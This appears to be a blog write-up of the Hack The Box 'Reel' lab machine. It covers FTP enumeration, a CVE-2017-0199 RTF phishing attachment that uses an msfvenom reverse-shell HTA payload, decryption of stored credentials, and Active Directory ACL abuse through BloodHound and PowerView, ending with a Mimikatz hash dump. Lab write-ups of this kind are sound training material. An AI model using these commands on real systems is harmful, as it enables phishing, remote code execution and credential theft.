8 min readJan 9, 2022


Hello everyone , HTB reel was a hard difficulty active directory machine , starting off with the nmap scan we have only 3 ports , ftp , ssh and smtp being an active directory machine this may seem odd as kerberos service should be running but it didn’t really felt the need of it , enumerating the ftp we can login as anonymous user and we can see few files out which a word document would give us an email to which we send an attachment through smtp following CVE-2017-0199 . We get a reverse shell as nico user and in this uses’s Desktop folder we can find a PSCredential in xml file which has tom’s redential which can decrypted as we own the xml , after decrypting and getting the plain text password we can run Sharphound through IEX to bypass execution policy for powershell scripts , after analyzing the data from sharphound in Bloodhound we can see that tom has WriteOwner permission on Claire user which can make us own claire object and give all rights on that object to reset the password , now checking what we can do with claire from bloodhound it shows that we have WriteDacl rights on Backup_Admin group which can allow us to add users into this group and being in this group we can access backup scripts in Administrators folder which will gives this account’s password


PORT   STATE SERVICE VERSION                                                                                                                  
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-28-18 11:19PM <DIR> documents
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey:
| 2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
| 256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|_ 256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
25/tcp open smtp?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLS
SessionReq, X11Probe:
| 220 Mail Service ready
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| Hello:
| 220 Mail Service ready
| EHLO Invalid domain address.
| Help:
| 220 Mail Service ready
| SIPOptions:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands


FTP has anonymous login enabled so we can easily login

We see a folder named documents

And in the folder we can see three files

Opening the Applocker.docx file it tell about making rules for some scripts

Opening Windows Event Forwarding.docx will warn us having a macro in it and will fail to recover document

Lastly the text file has this content in it

Please email me any rtf format procedures - I'll review and convert.
new format / converted documents will be saved here.

So from this file it pretty much tells that we need to make a phishing rtf document and send it through mail but the question is send to whom ? We don’t have any smb or ldap service which we can try to enumerate users from only smtp service is from where which can enumerate users but we do need a user first so running exiftool on word documents we get a username


To check if it’s a correct email address we can use VRFY to check but that command is not allowed in this smtp server

Instead we can use RCPT to check if the email address is valid

And nico@megabank.com is a valid address on which we can send an email , now to send a rtf file windows had a CVE related to rtf which can allow remote commands to be executed which was given a CVE CVE-2017-0199



Using an exploit from github we can craft a rtf in which we are going to include a url that will fetch hta file and it will execute on the system to give us a reverse shell for that we need to generate a hta file using msfvenom

msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=2222 -f hta-psh 
> abc.hta
python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://10.1

Now to send the mail with the attachment , I was having difficulty to figure out to send it , on google everyone mentioned doing it through telnet by specifying content-type and other headers but I found a neat tool called sawks


So running this to send an email to nico and starting the python server to hosts the hta file

swaks --server -f arz@htb.reel -t nico@megbank.com --attach Invoice.rtf

In nico's directory in Desktop folder we can see a cred.xml file, reading that file it seems that there's an encrypted password for Tom

Privilege Escalation (Tom)

Now here I ran into an issue to decrpyt this we need powershell and when I ran powershell the reverse shell would just hang

So we can just pass arguments to powershell and decrypt the password for user Tom

powershell.exe -c "$file = Import-Clixml -Path cred.xml;$file.GetNetworkCredential().Password"

Now that we have credentials for tom user we can use ssh to login

Checking which groups this user is in

In the Desktop directory we see a folder AD Audit which already has bloodhound folder in it

And from the text file it seems that no path is there to domain admin

We can import and run PowerView commands but I am just more comfortable with using bloodhound but we can't actually import sharphound script from the machine

Privilege Escalation (Claire)

So we can bypass this by loading the script in the memory through IEX which downloads the script and loads it into the memory

`Invoke-Bloodhound -CollectionMethod All -Domain HTB.LOCAL -ZipFileName loot.zip`

To transfer this we can use impacket’s smbserver to copy the zip file onto our machine

After this is transferred we can use bloodhound GUI to see what we can abuse in AD

We have WriteOwner access on claire object so we can own this object and give All rights on this object in order to reset password

Set-DomainObjectOwner -Identity claire -OwnerIdentity tom -Verbose
Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights All -Verbose

Privilege Escalation (Administrator)

Now through Claire we can see that we have WriteDacl on BACKUP_ADMINS

We can see the abuse that we can add users to this group

So logging in back with tom we see that we are a member of this group now

But it gets reverted quickly so we need to be quick in navigating to Administrators folder and there we will find some backup scripts out which BackupScript.ps1 has a password for administrator account

Having the password we can login through ssh

Further loading Mimikatz we can dump SAM hashes